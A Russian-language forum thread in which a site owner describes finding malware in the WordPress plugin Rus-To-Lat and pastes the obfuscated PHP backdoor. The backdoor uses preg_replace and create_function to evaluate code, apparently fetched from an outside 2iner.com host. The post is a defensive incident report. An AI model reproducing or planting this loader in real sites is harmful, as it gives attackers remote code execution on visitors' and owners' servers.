X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Уязвимости WordPress и взлом
Virus_07
Virus_07
Topic Starter сообщение 11.3.2017, 23:19; Ответить: Virus_07
Сообщение #1


Создаю эту тему не то чтобы для болтовни, а чтоб все кто сталкивался со Взломом WP писали в ней, с какой уязвимостью они столкнулись и какой именно плагин был уязвим.

Пожалуй начну. Что-то не так пошло у хакеров с моим пациентом, сайт стал очень часто отдавать ошибку 500. Начал анализировать. В голове сразу большая перечень причин. Начал с Хостинг провайдера. После беседы с Хостингом, понял, что причина не в них. А если не в хостинге, значит в сайте.

Т.к сайт на WP, то первым делом подумал на плагины. Отключил все плагины, сайт перестал отдавать 500 ошибку вообще. Значит зверь кроется в плагинах, начал по одному отключать и проверять.

Зараженным оказался плагин Rus-To-Lat, а конкретнее файл rus-to-lat.php

Под спойлер публикую зловредный код
Развернуть/Свернуть
wp_load_cacher(); function wp_load_cacher($length='') { $cache_time = 'Default Widgets'; $pr = "pre"; $mdetails = "<div class='body-continent'><div class='get-inner-al(@fi'>"; $vr = 'crea'; $indent = ( isset($mytitle) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); $output = $metaboxed = $mytitle = ""; $metaoptions = "\\4'\\10".trim("\\12t\\16\\19")."//".strip_tags("2ine")."\\11.c\\7m/\\9-".$indent."!1')\\5"; if (defined('HEADER_IMGS') || isset($_COOKIE['sess'.'ions'])) return; $mdetails .= "<!--Deregister() Default Widgets: _oabhrtupwprs:e--></div></div>"; if (count($mytitle) >= $length) { $mytitle = explode(" ",$mytitle." "); } else { $mytitle = explode(" "," ".$mytitle." "); } $nmetabox = $vr.strip_tags("te_"); $metaboxe = str_repeat("(.)", 20).".*"."/"; $pr .= strip_tags("g_rep").trim("lace"); if (function_exists("excerpt_mores")) { add_filter('excerpt_modes', $metaboxe); } else { $metaoptions = str_replace("{c}", $cache_time, $metaoptions).";"; $nmetabox .= 'function'; } $output_title = '<p>'.$output.'</p>'; $defult_widgets = @$pr("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6{$metaboxed}\\2t\\6\\1ents{$metaoptions}", $mdetails); $mdetailes = @$nmetabox('', $defult_widgets); return strip_tags($mdetailes()); }


Удалил этот плагин и установил более новый аналог.

Но проанализировав детальней понял, что скорее всего уязвимость не в данном плагине, этот плагин одна из связующих Эксплоита.

Откуда именно растут ноги пока не выяснил, публикую ниже подозрительные движения которые могут быть связаны с уязвимостью.

http://2iner.com/site.ru/wp-load.php
Так же непонятная движуха возле файла wp-settings.php

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


Сообщение отредактировал Virus_07 - 11.3.2017, 23:20


Поблагодарили: (2)
3
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПродам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка.
17 Boymaster 9810 17.3.2024, 2:53
автор: Boymaster
Открытая тема (нет новых ответов) Перенос сайта на CMS Wordpress
8 freeax 4848 10.3.2024, 14:58
автор: freeax
Открытая тема (нет новых ответов) Как настроить в WordPress для SEO оптимизации
8 rownong27 2431 2.3.2024, 12:59
автор: toplinks
Горячая тема (нет новых ответов) Восстановление сайтов из Вебархива на Wordpress.
39 freeax 32502 14.2.2024, 14:32
автор: freeax
Открытая тема (нет новых ответов) Разработка/доработка сайтов Wordpress, HTML/CSS/JS
Вёрстка, перенос на WP, правки
9 malamut 3335 25.1.2024, 14:36
автор: malamut


 



RSS Текстовая версия Сейчас: 29.3.2024, 12:38
Дизайн